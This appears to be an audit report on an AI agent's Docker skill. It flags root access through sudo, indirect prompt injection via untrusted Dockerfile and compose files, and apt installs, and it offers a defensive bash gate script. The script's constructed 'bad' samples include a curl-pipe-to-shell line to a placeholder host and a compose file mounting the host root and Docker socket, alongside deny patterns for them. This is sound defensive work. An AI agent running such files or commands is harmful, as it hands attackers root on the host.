linux-docker
Warn
Audited by Gen Agent Trust Hub on Mar 7, 2026
Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill facilitates the execution of Docker and Docker Compose commands and recommends 'sudo' to work around permission errors. Running docker under sudo gives the AI agent root-level privileges on the host. Note for reviewers: adding the agent's user to the docker group removes the sudo prompt but not the risk, since the Docker daemon itself runs as root and will bind-mount any host path a 'docker run' asks for.
- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it handles untrusted configuration data. (1) Ingestion points: the skill reads and parses 'Dockerfile' and 'docker-compose.yml' from the filesystem, so anything committed to the repository being built reaches the agent. (2) Boundary markers: the agent is given no markers or instructions to ignore commands or directives embedded in these files. (3) Capability inventory: 'docker build', 'docker run' (with volume mounting), 'docker-compose', and system-level 'apt install'; a compose file that sets 'privileged: true', 'network_mode: host', or mounts '/' or the Docker socket is therefore executed with the same trust as the agent's own commands. (4) Sanitization: no process for validating or sanitizing file contents is described, although the skill does proactively recommend runtime hardening flags such as '--cap-drop ALL' and '--read-only'.
- [EXTERNAL_DOWNLOADS]: The skill provides instructions for installing 'docker.io' (the distribution-packaged Docker engine) via the system package manager (apt). This is the standard way to set up the required environment; packages come from the host's configured apt repositories and are signature-checked by apt, so no ad-hoc download or 'curl | sh' step is involved.
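The two findings above (root via 'sudo docker', and Dockerfile/compose content that is trusted without inspection) can be mitigated in a wrapper that runs before the agent hands anything to docker. The script below is an added example written for this audit, not code from the linux-docker skill: it gates a project directory on a small pattern list, and builds the hardened 'docker run' line the skill's own advice ('--cap-drop ALL', '--read-only') points toward. The pattern lists, the 'preflight'/'hardened_run_cmd' names, the sample files, and the choice of hardening flags are all assumptions made for the example; nothing here invokes docker.

```bash
#!/usr/bin/env bash
# Added example, not part of the audited skill. A pre-flight gate an agent
# wrapper can run before it hands Dockerfile / docker-compose.yml content to
# docker. Nothing here invokes docker; it inspects files and prints a hardened
# `docker run` line. Pattern lists, names and sample files are assumptions.
set -u

# Compose settings that move a container across the host boundary.
COMPOSE_DANGER='privileged:[[:space:]]*true|network_mode:[[:space:]]*"?host"?|pid:[[:space:]]*"?host"?|/var/run/docker\.sock|cap_add:|-[[:space:]]*/:'
# Dockerfile instructions that pipe remote content into a shell or reach the socket.
DOCKERFILE_DANGER='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/var/run/docker\.sock'

# count_matches <file> <ERE>: number of matching lines (0 when none / file absent).
count_matches() {
  [ -f "$1" ] || { echo 0; return; }
  grep -cE "$2" "$1" || true
}

# show_matches <file> <ERE>: offending lines with numbers, for the agent log.
show_matches() {
  [ -f "$1" ] && grep -nE "$2" "$1" | sed "s|^|$1:|" || true
}

# preflight <project-dir>: prints BLOCK if either file trips a pattern, else ALLOW.
preflight() {
  local dir=$1 n
  n=$(( $(count_matches "$dir/docker-compose.yml" "$COMPOSE_DANGER") \
      + $(count_matches "$dir/Dockerfile" "$DOCKERFILE_DANGER") ))
  show_matches "$dir/docker-compose.yml" "$COMPOSE_DANGER" >&2
  show_matches "$dir/Dockerfile" "$DOCKERFILE_DANGER" >&2
  [ "$n" -eq 0 ] && echo ALLOW || echo BLOCK
}

# hardened_run_cmd <image> [cmd...]: the run line to prefer over a bare
# `docker run` (and over `sudo docker run`): no capabilities, no privilege
# escalation, read-only root fs, unprivileged uid, no network.
hardened_run_cmd() {
  local image=$1; shift
  printf '%s' "docker run --rm --cap-drop ALL --security-opt no-new-privileges" \
    " --read-only --tmpfs /tmp --pids-limit 256 --user 65534:65534 --network none $image"
  [ $# -gt 0 ] && printf ' %s' "$@"
  echo
}

# --- Constructed sample projects (not taken from any real repository) ---
WORK=$(mktemp -d); trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/bad" "$WORK/good"
cat > "$WORK/bad/docker-compose.yml" <<'EOF'
services:
  app:
    build: .
    privileged: true
    network_mode: host
    volumes:
      - /:/host
      - /var/run/docker.sock:/var/run/docker.sock
EOF
cat > "$WORK/bad/Dockerfile" <<'EOF'
FROM debian:bookworm-slim
RUN curl -fsSL https://example.invalid/setup.sh | sh
EOF
cat > "$WORK/good/docker-compose.yml" <<'EOF'
services:
  app:
    build: .
    read_only: true
    cap_drop:
      - ALL
EOF
cat > "$WORK/good/Dockerfile" <<'EOF'
FROM debian:bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends ca-certificates
EOF

echo "bad project:  $(preflight "$WORK/bad")"
echo "good project: $(preflight "$WORK/good")"
hardened_run_cmd debian:bookworm-slim id
```

The gate is deliberately a line-oriented allow/deny rather than a YAML parser: the point is that the decision is made by deterministic code the agent cannot be talked out of, not by the model reading the same file. A real wrapper would also refuse to prepend sudo and would run the daemon in rootless mode, which the example cannot demonstrate offline.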
Audit Metadata